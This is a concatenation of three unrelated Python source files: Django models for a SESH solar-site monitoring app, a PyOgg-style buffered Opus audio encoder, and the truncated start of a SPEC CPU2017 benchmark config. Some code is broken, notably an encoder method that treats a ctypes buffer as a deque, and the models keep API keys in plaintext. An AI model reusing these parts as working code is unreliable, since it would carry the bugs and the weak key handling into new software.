default='Africa/Kigali') position = GeopositionField() installed_kw = models.FloatField(default=None, blank=True) system_voltage = models.IntegerField(default=None, blank=True) number_of_panels = models.IntegerField(default=None, blank=True) #enphase_ID = models.CharField( max_length = 100) #TODO need to figure a way to show this in admin to automatically populate #enphase_site_id = models.IntegerField() import_data = models.BooleanField(default=False) battery_bank_capacity = models.IntegerField() has_genset = models.BooleanField(default=False) has_grid = models.BooleanField(default=False) has_pv = models.BooleanField(default=False) has_batteries =models.BooleanField(default=False) vrm_account = models.ForeignKey(VRM_Account,default=None,blank=True,null=True) vrm_site_id = models.CharField(max_length=20,default="",blank=True, null=True) status_card = models.OneToOneField(Status_Card,default=None,blank=True,null=True, on_delete=models.SET_NULL) site_measurements = models.OneToOneField(Site_Measurements, default=None,blank=True,null=True, on_delete=models.SET_NULL) def __str__(self): return self.site_name def save(self, *args, **kwargs): # If site is being created if self.pk is None: self.status_card = Status_Card.objects.create() self.site_measurements = Site_Measurements.objects.create() super(Sesh_Site, self).save(*args, **kwargs) Sensor_Node.objects.create(site=self) else: super(Sesh_Site, self).save(*args, **kwargs) def delete(self, *args, **kwargs): # Delete the site and its associated status card 
status_card = self.status_card site_measurements = self.site_measurements site_measurements.delete() status_card.delete() super(Sesh_Site, self).delete(*args, **kwargs) #Row based permissioning using django guardian not every user should be able to see all sites class Meta: verbose_name = 'Sesh Site' verbose_name_plural = 'Sesh Sites' permissions = ( ('view_Sesh_Site', 'View Sesh Site'), ) class Sesh_RMC_Account(models.Model): """ API key used by SESH EMON node to communicate """ site = models.OneToOneField(Sesh_Site, on_delete = models.CASCADE, primary_key = True) api_key = models.CharField(max_length=130,default="", unique=True) api_key_numeric = models.CharField(max_length=130, default="", unique=True) def __str__(self): return "alphanum:%s numeric:%s "%(self.api_key,self.api_key_numeric) def save(self, **kwargs): """ Generate numeric version of api key """ numeric_key = "" for l in self.api_key: numeric_key = numeric_key + str(ord(l)); self.api_key_numeric = numeric_key[:len(self.api_key)] super(Sesh_RMC_Account,self).save(**kwargs) class Meta: verbose_name = "RMC API Account" class Alert_Rule(models.Model): """ Basic Alert rule model Alerts are defined through field choices. if an alert is defined as <model-name>#<field> this will be checking the MYSQL db if an alert is simple <field-name> it will be queried in influx """ OPERATOR_CHOICES = ( ("eq" , "equals"), ("lt" , "less than"), ("gt" , "greater than"), ) OPERATOR_MAPPING = { 'eq' : '=', 'lt' : '<', 'gt' : '>', } site = models.ForeignKey(Sesh_Site) check_field = models.CharField(max_length=100) value = models.FloatField() operator = models.CharField(max_length=2, choices=OPERATOR_CHOICES, default="lt") #TODO a slug field with the field operator and value info can be added #TODO this is vastly incomplete!! 
    # fields need to be mappable and choices need to exist

    def __str__(self):
        return "If %s is %s %s" % (self.check_field, self.get_operator_display(), self.value)

    class Meta:
        verbose_name = 'System Alert Rule'
        verbose_name_plural = 'System Alert Rules'


# TODO Add alert Object to save alerts
class Sesh_Alert(models.Model):
    site = models.ForeignKey(Sesh_Site)
    alert = models.ForeignKey(Alert_Rule, related_name="alert_point")
    date = models.DateTimeField()
    isSilence = models.BooleanField()
    emailSent = models.BooleanField()
    smsSent = models.BooleanField()
    slackSent = models.BooleanField()
    point_model = models.CharField(max_length=40, default="BoM_Data_Point")
    point_id = models.CharField(max_length=40)

    # def __str__(self):
    #     return "Some texting text "
    #     % (self.alert.check_field, self.alert.operator, self.alert.value)

    def __str__(self):
        # TODO make this print useful information
        return str(self.alert)

    class Meta:
        verbose_name = 'System Alert'
        verbose_name_plural = 'System Alerts'


class RMC_status(models.Model):
    """
    Table containing status information for each RMC unit
    """
    # Removing due to infinite migration error
    # rmc_account = models.OneToOneField(Sesh_RMC_Account, on_delete=models.CASCADE, related_name="rmc_status")
    site = models.ForeignKey(Sesh_Site, blank=True, null=True)
    ip_address = models.GenericIPAddressField(default=None, null=True)
    minutes_last_contact = models.IntegerField(default=None)
    signal_strength = models.IntegerField(default=None, null=True)
    data_sent_24h = models.IntegerField(default=None, null=True)
    time = models.DateTimeField()
    target_alert = models.ForeignKey(Sesh_Alert, blank=True, null=True)

    def clean(self):
        if not self.site:
            raise ValidationError("RMC status object requires either rmc account or sesh site reference")

    class Meta:
        verbose_name = 'RMC Status'
        verbose_name_plural = 'RMC Statuses'


class BoM_Data_Point(models.Model):
    """
    BoM data: SoC, battery voltage, system voltage etc.
    Currently comes from Victron
    """
    # TODO unique together constraint on time and site
    site = models.ForeignKey(Sesh_Site)
    time = models.DateTimeField()
    soc = models.FloatField(default=0)
    battery_voltage = models.FloatField(default=0)
    battery_current = models.FloatField(default=0)
    AC_Voltage_in = models.FloatField(default=0)
    AC_Voltage_out = models.FloatField(default=0)
    AC_input = models.FloatField(default=0)
    AC_output = models.FloatField(default=0)
    AC_output_absolute = models.FloatField(default=0)
    AC_Load_in = models.FloatField(default=0)
    AC_Load_out = models.FloatField(default=0)
    # NEW: Victron now tells us PV production
    pv_production = models.FloatField(default=0)
    inverter_state = models.CharField(max_length=100, blank=True, null=True)
    target_alert = models.ForeignKey(Sesh_Alert, blank=True, null=True)
    main_on = models.BooleanField(default=False)
    genset_state = models.IntegerField(default=0)
    # TODO relay will likely need to be its own model
    relay_state = models.IntegerField(default=0)
    trans = models.IntegerField(default=0)

    def __str__(self):
        return " %s : %s : %s" % (self.time, self.site, self.soc)

    class Meta:
        verbose_name = 'Data Point'
        unique_together = ('site', 'time')


class Data_Point(models.Model):
    """
    Successor to Daily_Data_Point.
    Moving to a single field to have a variable number of fields
    """
    UNITS_DICTIONARY = (
        ("id", ''),
        ("soc", "%"),
        ('temperature', 'C'),
        ('humidity', '%'),
        ('PH', 'ph'),
        ('Ethanol', '%'),
        ("battery_voltage", "V"),
        ("AC_Voltage_in", "V"),
        ("AC_Voltage_out", "V"),
        ("AC_input", "W"),
        ("AC_output", "W"),
        ("AC_Load_in", "A"),
        ("AC_Load_out", "A"),
        ("cloud_cover", "%"),
        ("pv_production", "W"),
        ("main_on", ""),
        ("relay_state", ""),
        ("trans", ""),
        ("genset_state", ""),
        ("site", ""),
        ("AC_output_absolute", "W"),
        ("minutes_last_contact", "min"),
        ("daily_battery_charge", "Wh"),
        ("daily_grid_outage_n", "minute"),
        ("daily_grid_outage_t", ""),
        ("daily_grid_usage", "Wh"),
        ("daily_no_of_alerts", "alert"),
        ("daily_power_cons_pv", "W"),
        ("daily_power_consumption_total", "Wh"),
        ("daily_pv_yield", "Wh"),
    )

    MEASUREMENTS_VERBOSE_NAMES = (
        ("soc", "State of Charge"),
        ("battery_voltage", "Battery Voltage"),
        ("AC_Voltage_in", "AC Voltage In"),
        ("AC_Voltage_out", "AC Voltage Out"),
        ("AC_input", "AC Input"),
        ("AC_output", "AC Output"),
        ("AC_Load_in", "AC Load in"),
        ("AC_Load_out", "AC Load out"),
        ("pv_production", "PV Production"),
        ("main_on", "Main On"),
        ("relay_state", "Relay State"),
        ("trans", "Trans"),
        ("genset_state", "Genset State"),
        ("AC_output_absolute", "AC Output absolute"),
        ("minutes_last_contact", "Minutes last Contact"),
        ("daily_battery_charge", "Daily Battery Charge"),
        ("daily_grid_outage_n", "Daily Grid Outage N"),
        ("daily_grid_outage_t", "Daily Grid Outage T"),
        ("daily_grid_usage", "Daily Grid Usage"),
        ("daily_no_of_alerts", "Daily Number of Alerts"),
        ("daily_power_cons_pv", "Daily Power Cons Pv"),
        ("daily_power_consumption_total", "Daily Power Consumption Total"),
        ("daily_pv_yield", "Daily Pv Yield"),
        ("cloud_cover", "Cloud Cover"),
    )

    site = models.ForeignKey(Sesh_Site)
    # CharFields here: the original declared these as FloatFields, but the
    # stored values and the choices above are strings, which would not validate
    field_name = models.CharField(max_length=40, verbose_name="Data Point Name", choices=MEASUREMENTS_VERBOSE_NAMES)
    field_unit = models.CharField(max_length=40, verbose_name="Data Point Unit", choices=UNITS_DICTIONARY)
    field_scale = models.FloatField(default=1)
    # TODO Perhaps add scale as well?


class Daily_Data_Point(models.Model):
    """
    Daily aggregate of data points
    """
    UNITS_DICTIONARY = {
        "id": '',
        "soc": "%",
        "battery_voltage": "V",
        "AC_Voltage_in": "V",
        "AC_Voltage_out": "V",
        "AC_input": "W",
        "AC_output": "W",
        "AC_Load_in": "A",
        "AC_Load_out": "A",
        "cloud_cover": "%",
        "pv_production": "W",
        "main_on": "",
        "relay_state": "",
        "trans": "",
        "genset_state": "",
        "site": "",
        "AC_output_absolute": "W",
        "minutes_last_contact": "min",
        "daily_battery_charge": "Wh",
        "daily_grid_outage_n": "minute",
        "daily_grid_outage_t": "",
        "daily_grid_usage": "Wh",
        "daily_no_of_alerts": "alert",
        "daily_power_cons_pv": "W",
        "daily_power_consumption_total": "Wh",
        "daily_pv_yield": "Wh",
    }

    MEASUREMENTS_VERBOSE_NAMES = {
        "soc": "State of Charge",
        "battery_voltage": "Battery Voltage",
        "AC_Voltage_in": "AC Voltage In",
        "AC_Voltage_out": "AC Voltage Out",
        "AC_input": "AC Input",
        "AC_output": "AC Output",
        "AC_Load_in": "AC Load in",
        "AC_Load_out": "AC Load out",
        "pv_production": "PV Production",
        "main_on": "Main On",
        "relay_state": "Relay State",
        "trans": "Trans",
        "genset_state": "Genset State",
        "AC_output_absolute": "AC Output absolute",
        "minutes_last_contact": "Minutes last Contact",
        "daily_battery_charge": "Daily Battery Charge",
        "daily_grid_outage_n": "Daily Grid Outage N",
        "daily_grid_outage_t": "Daily Grid Outage T",
        "daily_grid_usage": "Daily Grid Usage",
        "daily_no_of_alerts": "Daily Number of Alerts",
        "daily_power_cons_pv": "Daily Power Cons Pv",
        "daily_power_consumption_total": "Daily Power Consumption Total",
        "daily_pv_yield": "Daily Pv Yield",
        "cloud_cover": "Cloud Cover",
    }

    DEFAULT_UNIT = "%"

    site = models.ForeignKey(Sesh_Site)
    daily_pv_yield = models.FloatField(default=0, verbose_name="Daily PV Yield")  # Aggregate pv produced that day, kWh
    daily_power_consumption_total = models.FloatField(default=0, verbose_name="Daily Power Consumption")
    daily_power_cons_pv = models.FloatField(default=0, verbose_name="Power consumption pv")
    daily_battery_charge = models.FloatField(default=0, verbose_name="Battery Charge")  # Amount of charge put in battery
    daily_grid_outage_t = models.FloatField(default=0, verbose_name="Grid outage t")  # Amount of time the grid was off
    daily_grid_outage_n = models.FloatField(default=0, verbose_name="Grid outage n")  # Aggregate number of times the grid was off
    daily_grid_usage = models.FloatField(default=0, verbose_name="Grid usage")  # Aggregate amount of grid used
    daily_no_of_alerts = models.IntegerField(default=0, verbose_name="Number of alerts")
    date = models.DateTimeField()

    class Meta:
        verbose_name = 'Daily Aggregate Data Point'
        unique_together = ('site', 'date')

    def __str__(self):
        return " sitename:%s \n pv_yield:%s \n power_used:%s \n daily_batt_charge:%s \n grid power used: %s" % (self.site.site_name, self.daily_pv_yield, self.daily_power_cons_pv, self.daily_battery_charge, self.daily_grid_usage)


class Trend_Data_Point(models.Model):
    """
    Successor to aggregate data points. Each site can have an almost
    unlimited number of aggregate data points; Trend_Data_Point supersedes
    Daily_Data_Point for this purpose.
    """
    site = models.ForeignKey(Sesh_Site)
    aggrge_field_name = models.FloatField(default=0)


class Site_Weather_Data(models.Model):
    """
    Weather data to overlay with each site
    """
    site = models.ForeignKey(Sesh_Site)
    date = models.DateTimeField('date', unique_for_date=True)
    temp = models.IntegerField()
    condition = models.CharField(max_length=20)
    cloud_cover = models.FloatField()
    sunrise = models.TimeField()
    sunset = models.TimeField()

    class Meta:
        verbose_name = 'Weather Data'
        unique_together = ('site', 'date')


class Status_Rule(models.Model):
    """
    battery_voltage rules and pv_production rules
    """
    battery_rules = {
        50: "red",
        70: "yellow",
        100: "green"
    }

    weather_rules = {
        0.7: "green",
        1: "yellow"
    }

    def __str__(self):
        # The original referenced a non-existent pv_rules attribute
        return str(self.battery_rules) + str(self.weather_rules)


# Used globally?
SENSORS_LIST = {
    'Tx',
    'Th',
    'Pe'
}


class Sensor_Node(models.Model):
    """
    Table representing the emon tx
    """
    SENSOR_TYPE_CHOICES = (
        ('th', 'Temperature Humidity'),
        ('tx', 'Power Voltage'),
        ('pe', 'Ph Ethanol'),
        ('other', 'Other Sensor'),
    )
    site = models.ForeignKey(Sesh_Site)
    node_id = models.IntegerField(default=0)
    sensor_type = models.CharField(max_length=40, choices=SENSOR_TYPE_CHOICES)
    index1 = models.CharField(max_length=40)
    index2 = models.CharField(max_length=40, blank=True, null=True)
    index3 = models.CharField(max_length=40, blank=True, null=True)
    index4 = models.CharField(max_length=40, blank=True, null=True)
    index5 = models.CharField(max_length=40, blank=True, null=True)
    index6 = models.CharField(max_length=40, blank=True, null=True)
    index7 = models.CharField(max_length=40, blank=True, null=True)
    index8 = models.CharField(max_length=40, blank=True, null=True)
    index9 = models.CharField(max_length=40, blank=True, null=True)
    index10 = models.CharField(max_length=40, blank=True, null=True)
    index11 = models.CharField(max_length=40, blank=True, null=True)
    index12 = models.CharField(max_length=40, blank=True, null=True)
    index13 = models.CharField(max_length=40, blank=True, null=True)
    index14 = models.CharField(max_length=40, blank=True, null=True)
    index15 = models.CharField(max_length=40, blank=True, null=True)
    index16 = models.CharField(max_length=40, blank=True, null=True)
    index17 = models.CharField(max_length=40, blank=True, null=True)
    index18 = models.CharField(max_length=40, blank=True, null=True)
    index19 = models.CharField(max_length=40, blank=True, null=True)
    index20 = models.CharField(max_length=40, blank=True, null=True)
    index21 = models.CharField(max_length=40, blank=True, null=True)
    index22 = models.CharField(max_length=40, blank=True, null=True)
    index23 = models.CharField(max_length=40, blank=True, null=True)
    index24 = models.CharField(max_length=40, blank=True, null=True)
    index25 = models.CharField(max_length=40, blank=True, null=True)
    index26 = models.CharField(max_length=40, blank=True, null=True)
    index27 = models.CharField(max_length=40, blank=True, null=True)
    index28 = models.CharField(max_length=40, blank=True, null=True)
    index29 = models.CharField(max_length=40, blank=True, null=True)
    index30 = models.CharField(max_length=40, blank=True, null=True)
    index31 = models.CharField(max_length=40, blank=True, null=True)
    index32 = models.CharField(max_length=40, blank=True, null=True)
    index33 = models.CharField(max_length=40, blank=True, null=True)
    index34 = models.CharField(max_length=40, blank=True, null=True)
    index35 = models.CharField(max_length=40, blank=True, null=True)
    index36 = models.CharField(max_length=40, blank=True, null=True)
    index37 = models.CharField(max_length=40, blank=True, null=True)
    index38 = models.CharField(max_length=40, blank=True, null=True)
    index39 = models.CharField(max_length=40, blank=True, null=True)
    index40 = models.CharField(max_length=40, blank=True, null=True)
    index41 = models.CharField(max_length=40, blank=True, null=True)
    index42 = models.CharField(max_length=40, blank=True, null=True)

    def __str__(self):
        return "Sensor Node " + str(self.sensor_type) + " for " + self.site.site_name + " with id " + str(self.node_id)

    def save(self, *args, **kwargs):
        if not Sensor_Mapping.objects.filter(site_id=self.site.id, node_id=self.node_id, sensor_type=self.sensor_type):
            Sensor_Mapping.objects.create(site_id=self.site.id, node_id=self.node_id, sensor_type=self.sensor_type)
        super(Sensor_Node, self).save(*args, **kwargs)

    def delete(self, *args, **kwargs):
        Sensor_Mapping.objects.filter(site_id=self.site.id, node_id=self.node_id, sensor_type=self.sensor_type).delete()
        super(Sensor_Node, self).delete(*args, **kwargs)

    def get_fields(self):
        """
        Returns the fields of the sensor
        """
        # The original list repeated index5 and skipped index27; both are fixed here
        all_fields = [self.index1, self.index2, self.index3, self.index4, self.index5,
                      self.index6, self.index7, self.index8, self.index9, self.index10, self.index11, self.index12,
                      self.index13, self.index14, self.index15, self.index16, self.index17, self.index18, self.index19,
                      self.index20, self.index21, self.index22, self.index23, self.index24, self.index25, self.index26,
                      self.index27, self.index28, self.index29, self.index30, self.index31, self.index32, self.index33,
                      self.index34, self.index35, self.index36, self.index37, self.index38, self.index39, self.index40,
                      self.index41, self.index42]

        fields = []
        for field in all_fields:
            if field:
                fields.append(field)

        return list(set(fields))  # removing duplicate values if any


class Sensor_Mapping(models.Model):
    """
    Contains information about the mapping of sensor node_ids to sites.
    This helps in the writing of data to the database by the sesh-api-helper
    """
    site_id = models.IntegerField()
    node_id = models.IntegerField()
    sensor_type = models.CharField(max_length=40)

    def __str__(self):
        return "Site_id: " + str(self.site_id) + " node_id: " + str(self.node_id) + ": " + str(self.sensor_type)

    class Meta:
        unique_together = ('site_id', 'node_id', 'sensor_type')


class Report_Job(models.Model):
    """
    Model to contain the reports that should be sent to users of specific sites
    """
    DURATION_CHOICES = (
        ('daily', 'Daily'),
        ('weekly', 'Weekly'),
        ('monthly', 'Monthly'),
    )
    site = models.ForeignKey(Sesh_Site)
    duration = models.CharField(max_length=40, choices=DURATION_CHOICES)
    day_to_report = models.IntegerField()  # The day on which the report executes; for a weekly report, 2 means Tuesday
    attributes = JSONField()

    def __str__(self):
        return self.get_duration_display() + " report for " + self.site.site_name

    def get_duration_choices(self):
        duration_list = []

        for item in self.DURATION_CHOICES:
            duration_list.append(item[0])

        return duration_list


class Report_Sent(models.Model):
    """
    Store each report sent for later viewing or resending
    """
    report_job = models.ForeignKey(Report_Job)
    title = models.CharField(max_length=60)
    date = models.DateTimeField()
    status = models.CharField(max_length=100)
    content = models.TextField()
    sent_to = JSONField()  # list of users the report was sent to


class Data_Process_Rule(models.Model):
    """
    For building aggregate batch processing functions
    """
    FUNCTION_CHOICES = (
        ("mean", "average"),
        ("sum", "aggregate"),
        ("min", "minimum"),
        ("max", "maximum"),
        ("mid", "median"),
        ("std", "standard deviation"),
    )

    TIME_BUCKETS = (
        ("5m", "5 minutes"),
        ("10m", "10 minutes"),
        ("30m", "30 minutes"),
        ("1h", "1 hour"),
        ("2h", "2 hours"),
        ("5h", "5 hours")
    )

    DURATION = (
        ("12h", "12 hours"),
        ("24h", "24 hours"),
        ("48h", "48 hours"),
        ("7d", "7 days"),
        ("31d", "1 month"),
    )

    site = models.ForeignKey(Sesh_Site)
    function_type = models.CharField(max_length=40, default="aggregate", choices=FUNCTION_CHOICES)
    input_field = models.ForeignKey(Daily_Data_Point)
    duration = models.CharField(max_length=40, default="24h", choices=DURATION)
    interval = models.CharField(max_length=10, default="5m", choices=TIME_BUCKETS)
    output_field = models.ForeignKey(Trend_Data_Point)
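
# --- Usage sketch (added for illustration; assumes a configured Django
# environment and migrated database) ---
# Creating a Sesh_Site triggers its overridden save(), which auto-creates
# the linked Status_Card, Site_Measurements and a Sensor_Node:
#
#   org = Sesh_Organisation.objects.create(name="demo-org")
#   site = Sesh_Site.objects.create(
#       site_name="demo-site",
#       organisation=org,
#       comission_date=timezone.now(),
#       location_city="Kigali",
#       location_country="Rwanda",
#       position="0,0",
#       installed_kw=5.0,
#       system_voltage=48,
#       number_of_panels=12,
#       battery_bank_capacity=1000,
#   )
#   assert site.status_card is not None
#   assert Sensor_Node.objects.filter(site=site).exists()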
11589413
import copy
import ctypes
from typing import Optional, ByteString, List, Tuple, Callable
import warnings

from . import opus
from .opus_encoder import OpusEncoder
from .pyogg_error import PyOggError


class OpusBufferedEncoder(OpusEncoder):
    # TODO: This could be made more efficient. We don't need a
    # deque. Instead, we need only sufficient PCM storage for one
    # whole packet. We know the size of the packet thanks to
    # set_frame_size().

    def __init__(self) -> None:
        super().__init__()

        self._frame_size_ms: Optional[float] = None
        self._frame_size_bytes: Optional[int] = None

        # Buffer contains the bytes required for the next
        # frame.
        self._buffer: Optional[ctypes.Array] = None

        # Location of the next free byte in the buffer
        self._buffer_index = 0

    def set_frame_size(self, frame_size: float) -> None:
        """ Set the desired frame duration (in milliseconds).
        Valid options are 2.5, 5, 10, 20, 40, or 60ms.

        """
        # Ensure the frame size is valid. Compare frame size in
        # units of 0.1ms to avoid floating point comparison
        if int(frame_size*10) not in [25, 50, 100, 200, 400, 600]:
            raise PyOggError(
                "Frame size ({:f}) not one of ".format(frame_size)+
                "the acceptable values"
            )

        self._frame_size_ms = frame_size

        self._calc_frame_size()

    def set_sampling_frequency(self, samples_per_second: int) -> None:
        super().set_sampling_frequency(samples_per_second)
        self._calc_frame_size()

    def buffered_encode(self,
                        pcm_bytes: memoryview,
                        flush: bool = False,
                        callback: Optional[Callable[[memoryview, int, bool], None]] = None
                        ) -> List[Tuple[memoryview, int, bool]]:
        """Gets encoded packets and their number of samples.

        This method returns a list, where each item in the list is
        a tuple. The first item in the tuple is an Opus-encoded
        frame stored as a bytes-object. The second item in the
        tuple is the number of samples encoded (excluding
        silence).

        If `callback` is supplied then this method will instead
        return an empty list but call the callback for every
        Opus-encoded frame that would have been returned as a
        list. This option has the desirable property of
        eliminating the copying of the encoded packets, which is
        required in order to form a list. The callback should
        take two arguments, the encoded frame (a Python bytes
        object) and the number of samples encoded per channel (an
        int). The user must either process or copy the data as
        the data may be overwritten once the callback terminates.

        """
        # If there's no work to do return immediately
        if len(pcm_bytes) == 0 and flush == False:
            return [] # no work to do

        # Sanity checks
        if self._frame_size_ms is None:
            raise PyOggError("Frame size must be set before encoding")
        assert self._frame_size_bytes is not None
        assert self._channels is not None
        assert self._buffer is not None
        assert self._buffer_index is not None

        # Local variable initialisation
        results = []
        pcm_index = 0
        pcm_len = len(pcm_bytes)

        # 'Cast' memoryview of PCM to ctypes Array
        Buffer = ctypes.c_ubyte * len(pcm_bytes)
        try:
            pcm_ctypes = Buffer.from_buffer(pcm_bytes)
        except TypeError:
            warnings.warn(
                "Because PCM was read-only, an extra memory "+
                "copy was required; consider storing PCM in "+
                "writable memory (for example, bytearray "+
                "rather than bytes)."
            )
            # from_buffer_copy() accepts read-only buffers, at the cost of
            # the extra copy warned about above (the original repeated
            # from_buffer() here, which would simply raise TypeError again)
            pcm_ctypes = Buffer.from_buffer_copy(pcm_bytes)

        # Either store the encoded packet to return at the end of the
        # method or immediately call the callback with the encoded
        # packet.
def store_or_callback(encoded_packet: memoryview, samples: int, end_of_stream: bool = False) -> None: if callback is None: # Store the result results.append(( encoded_packet, samples, end_of_stream )) else: # Call the callback callback( encoded_packet, samples, end_of_stream ) # Fill the remainder of the buffer with silence and encode it. # The associated number of samples are only that of actual # data, not the added silence. def flush_buffer() -> None: # Sanity checks to satisfy mypy assert self._buffer_index is not None assert self._channels is not None assert self._buffer is not None # If the buffer is already empty, we have no work to do if self._buffer_index == 0: return # Store the number of samples currently in the buffer samples = ( self._buffer_index // self._channels // ctypes.sizeof(opus.opus_int16) ) # Fill the buffer with silence ctypes.memset( # destination ctypes.byref(self._buffer, self._buffer_index), # value 0, # count len(self._buffer) - self._buffer_index ) # Encode the PCM # As at 2020-11-05, mypy is unaware that ctype Arrays # support the buffer protocol. encoded_packet = self.encode(memoryview(self._buffer)) # type: ignore # Either store the encoded packet or call the # callback store_or_callback(encoded_packet, samples, True) # Copy the data remaining from the provided PCM into the # buffer. Flush if required. def copy_insufficient_data() -> None: # Sanity checks to satisfy mypy assert self._buffer is not None # Calculate remaining data remaining_data = len(pcm_bytes) - pcm_index # Copy the data into the buffer. ctypes.memmove( # destination ctypes.byref(self._buffer, self._buffer_index), # source ctypes.byref(pcm_ctypes, pcm_index), # count remaining_data ) self._buffer_index += remaining_data # If we've been asked to flush the buffer then do so if flush: flush_buffer() # Loop through the provided PCM and the current buffer, # encoding as we have full packets. while True: # There are two possibilities at this point: either we # have previously unencoded data still in the buffer or we # do not if self._buffer_index == 0: # We do not have unencoded data # We are free to progress through the PCM that has # been provided encoding frames without copying any # bytes. Once there is insufficient data remaining # for a complete frame, that data should be copied # into the buffer and we have finished. if pcm_len - pcm_index > self._frame_size_bytes: # We have enough data remaining in the provided # PCM to encode more than an entire frame without # copying any data. Unfortunately, splicing a # ctypes array copies the array. To avoid the # copy we use memoryview see # https://mattgwwalker.wordpress.com/2020/12/12/python-ctypes-slicing/ frame_data = memoryview(pcm_bytes)[ pcm_index:pcm_index+self._frame_size_bytes ] # Update the PCM index pcm_index += self._frame_size_bytes # Store number of samples (per channel) of actual # data samples = ( len(frame_data) // self._channels // ctypes.sizeof(opus.opus_int16) ) # Encode the PCM encoded_packet = super().encode(frame_data) # Either store the encoded packet or call the # callback store_or_callback(encoded_packet, samples) else: # We do not have enough data to fill a frame while # still having data left over. Copy the data into # the buffer. copy_insufficient_data() return results else: # We have unencoded data. # Copy the provided PCM into the buffer (up until the # buffer is full). If we can fill it, then we can # encode the filled buffer and continue. If we can't # fill it then we've finished. 
data_required = len(self._buffer) - self._buffer_index if pcm_len > data_required: # We have sufficient data to fill the buffer and # have data left over. Copy data into the buffer. assert pcm_index == 0 remaining = len(self._buffer) - self._buffer_index ctypes.memmove( # destination ctypes.byref(self._buffer, self._buffer_index), # source pcm_ctypes, # count remaining ) pcm_index += remaining self._buffer_index += remaining assert self._buffer_index == len(self._buffer) # Encode the PCM encoded_packet = super().encode( # Memoryviews of ctypes do work, even though # mypy complains. memoryview(self._buffer) # type: ignore ) # Store number of samples (per channel) of actual # data samples = ( self._buffer_index // self._channels // ctypes.sizeof(opus.opus_int16) ) # We've now processed the buffer self._buffer_index = 0 # Either store the encoded packet or call the # callback store_or_callback(encoded_packet, samples) else: # We have insufficient data to fill the buffer # while still having data left over. Copy the # data into the buffer. copy_insufficient_data() return results def _calc_frame_size(self): """Calculates the number of bytes in a frame. If the frame size (in milliseconds) and the number of samples per seconds have already been specified, then the frame size in bytes is set. Otherwise, this method does nothing. The frame size is measured in bytes required to store the sample. """ if (self._frame_size_ms is None or self._samples_per_second is None): return self._frame_size_bytes = ( self._frame_size_ms * self._samples_per_second // 1000 * ctypes.sizeof(opus.opus_int16) * self._channels ) # Allocate space for the buffer Buffer = ctypes.c_ubyte * self._frame_size_bytes self._buffer = Buffer() def _get_next_frame(self, add_silence=False): """Gets the next Opus-encoded frame. Returns a tuple where the first item is the Opus-encoded frame and the second item is the number of encoded samples (per channel). Returns None if insufficient data is available. """ next_frame = bytes() samples = 0 # Ensure frame size has been specified if self._frame_size_bytes is None: raise PyOggError( "Desired frame size hasn't been set. Perhaps "+ "encode() was called before set_frame_size() "+ "and set_sampling_frequency()?" ) # Check if there's insufficient data in the buffer to fill # a frame. if self._frame_size_bytes > self._buffer_size: if len(self._buffer) == 0: # No data at all in buffer return None if add_silence: # Get all remaining data while len(self._buffer) != 0: next_frame += self._buffer.popleft() self._buffer_size = 0 # Store number of samples (per channel) of actual # data samples = ( len(next_frame) // self._channels // ctypes.sizeof(opus.opus_int16) ) # Fill remainder of frame with silence bytes_remaining = self._frame_size_bytes - len(next_frame) next_frame += b'\x00' * bytes_remaining return (next_frame, samples) else: # Insufficient data to fill a frame and we're not # adding silence return None bytes_remaining = self._frame_size_bytes while bytes_remaining > 0: if len(self._buffer[0]) <= bytes_remaining: # Take the whole first item buffer_ = self._buffer.popleft() next_frame += buffer_ bytes_remaining -= len(buffer_) self._buffer_size -= len(buffer_) else: # Take only part of the buffer # TODO: This could be more efficiently # implemented. Rather than appending back the # remaining data, we could just update an index # saying where we were up to in regards to the # first entry of the buffer. 
buffer_ = self._buffer.popleft() next_frame += buffer_[:bytes_remaining] self._buffer_size -= bytes_remaining # And put the unused part back into the buffer self._buffer.appendleft(buffer_[bytes_remaining:]) bytes_remaining = 0 # Calculate number of samples (per channel) samples = ( len(next_frame) // self._channels // ctypes.sizeof(opus.opus_int16) ) return (next_frame, samples)
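if __name__ == "__main__":
    # Hedged usage sketch (not part of the original module), assuming the
    # parent OpusEncoder exposes set_application() and set_channels() as in
    # PyOgg.  Feeds one second of silent 48 kHz mono PCM through the
    # buffered encoder; flush=True forces out any buffered samples in a
    # final packet flagged as the end of the stream.
    encoder = OpusBufferedEncoder()
    encoder.set_application("audio")
    encoder.set_sampling_frequency(48000)
    encoder.set_channels(1)
    encoder.set_frame_size(20)  # milliseconds

    # Writable PCM (bytearray) avoids the read-only copy warning above.
    pcm = memoryview(bytearray(48000 * 2))  # 1 s of 16-bit mono silence
    for packet, samples, end_of_stream in encoder.buffered_encode(pcm, flush=True):
        # Each packet is a memoryview into the encoder's buffer; copy it
        # (e.g. bytes(packet)) if it must outlive the next encode call.
        print(len(packet), samples, end_of_stream)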
11589436
import itertools  # needed by _cam4_setup below
from lapidary.config.specbench.Benchmark import Benchmark from enum import Enum from pathlib import Path import os import shutil class Spec2017Bench: class Benchmarks(Enum): PERL = '500.perlbench_r' GCC = '502.gcc_r' BWAVES = '503.bwaves_r' MCF = '505.mcf_r' CACTUS = '507.cactuBSSN_r' NAMD = '508.namd_r' PAREST = '510.parest_r' POVRAY = '511.povray_r' LBM = '519.lbm_r' OMNETPP = '520.omnetpp_r' WRF = '521.wrf_r' XALAN = '523.xalancbmk_r' X264 = '525.x264_r' BLENDER = '526.blender_r' CAM4 = '527.cam4_r' DEEPSJENG = '531.deepsjeng_r' IMAGICK = '538.imagick_r' LEELA = '541.leela_r' NAB = '544.nab_r' EXCHANGE2 = '548.exchange2_r' FOTONIK3D = '549.fotonik3d_r' ROMS = '554.roms_r' XZ = '557.xz_r' BENCHMARKS = [b.value for b in Benchmarks] BIN_NAMES = { Benchmarks.PERL.value: 'perlbench_r', Benchmarks.GCC.value: 'cpugcc_r', Benchmarks.BWAVES.value: 'bwaves_r', Benchmarks.MCF.value: 'mcf_r', Benchmarks.CACTUS.value: 'cactusBSSN_r', Benchmarks.NAMD.value: 'namd_r', Benchmarks.PAREST.value: 'parest_r', Benchmarks.POVRAY.value: 'povray_r', Benchmarks.LBM.value: 'lbm_r', Benchmarks.OMNETPP.value: 'omnetpp_r', Benchmarks.WRF.value: 'wrf_r', Benchmarks.XALAN.value: 'cpuxalan_r', Benchmarks.X264.value: 'x264_r', Benchmarks.BLENDER.value: 'blender_r', Benchmarks.CAM4.value: 'cam4_r', Benchmarks.DEEPSJENG.value: 'deepsjeng_r', Benchmarks.IMAGICK.value: 'imagick_r', Benchmarks.LEELA.value: 'leela_r', Benchmarks.NAB.value: 'nab_r', Benchmarks.EXCHANGE2.value: 'exchange2_r', Benchmarks.FOTONIK3D.value: 'fotonik3d_r', Benchmarks.ROMS.value: 